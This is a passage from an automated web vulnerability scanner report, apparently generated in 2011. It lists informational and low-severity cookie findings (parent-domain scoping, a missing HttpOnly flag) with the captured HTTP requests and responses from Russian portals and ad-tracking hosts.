Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1184
Connection: keep-alive
Set-Cookie: p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

15.85. http://r2.mail.ru/b13058968.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058968.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058968.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 23542
Connection: keep-alive
Set-Cookie: p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:17 23:49:14.........
...[SNIP]...

15.86. http://r2.mail.ru/b13059223.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059223.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059223.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3609
Connection: keep-alive
Set-Cookie: p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................................................C.......................................................................2.2..".............................    
...[SNIP]...

15.87. http://r2.mail.ru/b13059860.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059860.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059860.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1805
Connection: keep-alive
Set-Cookie: p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................2.2..
...[SNIP]...

15.88. http://r2.mail.ru/b13060405.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060405.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060405.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:24 GMT
Content-Type: image/jpeg
Content-Length: 1285
Connection: keep-alive
Set-Cookie: p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:24 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2.2.."..............................
...[SNIP]...

15.89. http://r2.mail.ru/b13060487.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060487.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060487.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1840
Connection: keep-alive
Set-Cookie: p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.......................

............................... "..".......C.....................................................................2.2.................................
...[SNIP]...

15.90. http://r2.mail.ru/b13061099.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13061099.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13061099.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 3520
Connection: keep-alive
Set-Cookie: p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<.........R.u.s.s.i.a.n. .P.r.e.s.i.d.e.n.t. .D.m.i.t.r.y. .M.e.d.v.e.d.e.v. .i.s. .s.e.e.n. .a.g.a.i.n.s.t. .t.h.e. .b.a.c.k.g.r.o.u.n.d. .o.f. .R.u.s.s.i.a.'.s. .
...[SNIP]...

15.91. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741244306/rexdot.gif?l=11&id=dv1K38epj5OVvUz_k_bVXZdS..OUmvCYJk0brLMVk1z.X7&tz=300&href=http%3A//pretty.ru/&ref=&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gtestss=TyHLZcpeZ6QeXgn5D25OXPa7; Gdyn=KlS_MB9GvGQpqwo8SYS8RSpGLl2xMSy8rDOx5Rf1MG88inAs-QFjaGGM8GGaSbY3W5bQsj8GmbsxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:55 GMT
Expires: Sun, 24 Apr 2011 14:44:55 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

15.92. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741312919/rexdot.gif?l=11&id=16LgHadxo4kFfevqG4Osi_UTDmyR8tuASw2dzIE9wLz.x7&tz=300&href=http%3A//pda.loveplanet.ru/&ref=http%3A//my.webalta.ru/&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestss=4YEhxFlgK1uccYJIgsvm8f57; Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gdyn=KlGUSB9GvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REQ58k5vpXJc90jGFyFxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:52:49 GMT
Expires: Sun, 24 Apr 2011 14:52:49 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

15.93. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSDaDyc4OZiB56AgTFzPHdGMAkgUIPg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 14:40:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 25-Apr-2011 14:40:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=772369&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...

15.94. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/trafic.js HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:20:47 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:20:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro
Connection: close

t_js_dw_time=new Date().getTime();document.write('<scr' + 'ipt type="text/javascript" src="http://storage.trafic.ro/js/trafic.js?tk='+(Math.pow(10,16) * Math.random())+'&t_rid='+t_rid+'"></sc' + 'ript
...[SNIP]...

15.95. http://top5.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top5.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=110605;js=13;r=;j=true;s=1920*1200;d=16;rand=0.07091198652051389 HTTP/1.1
Host: top5.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:48:03 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

15.96. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...

15.97. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tns-counter.ru
Path:   /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 HTTP/1.1
Host: www.tns-counter.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: tns-counter.0.5.3
Date: Mon, 25 Apr 2011 14:20:23 GMT
Content-Type: image/gif
Content-Length: 43
Location: http://www.tns-counter.ru/V13b***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Set-Cookie: guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

GIF89a.............!.......,...........L..;

16. Cookie without HttpOnly flag set  previous  next
There are 205 instances of this issue:


16.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
If-None-Match: "0-gzip"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D12D472907FE3E04E0769EB34E0D8495; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:16 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

16.2. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
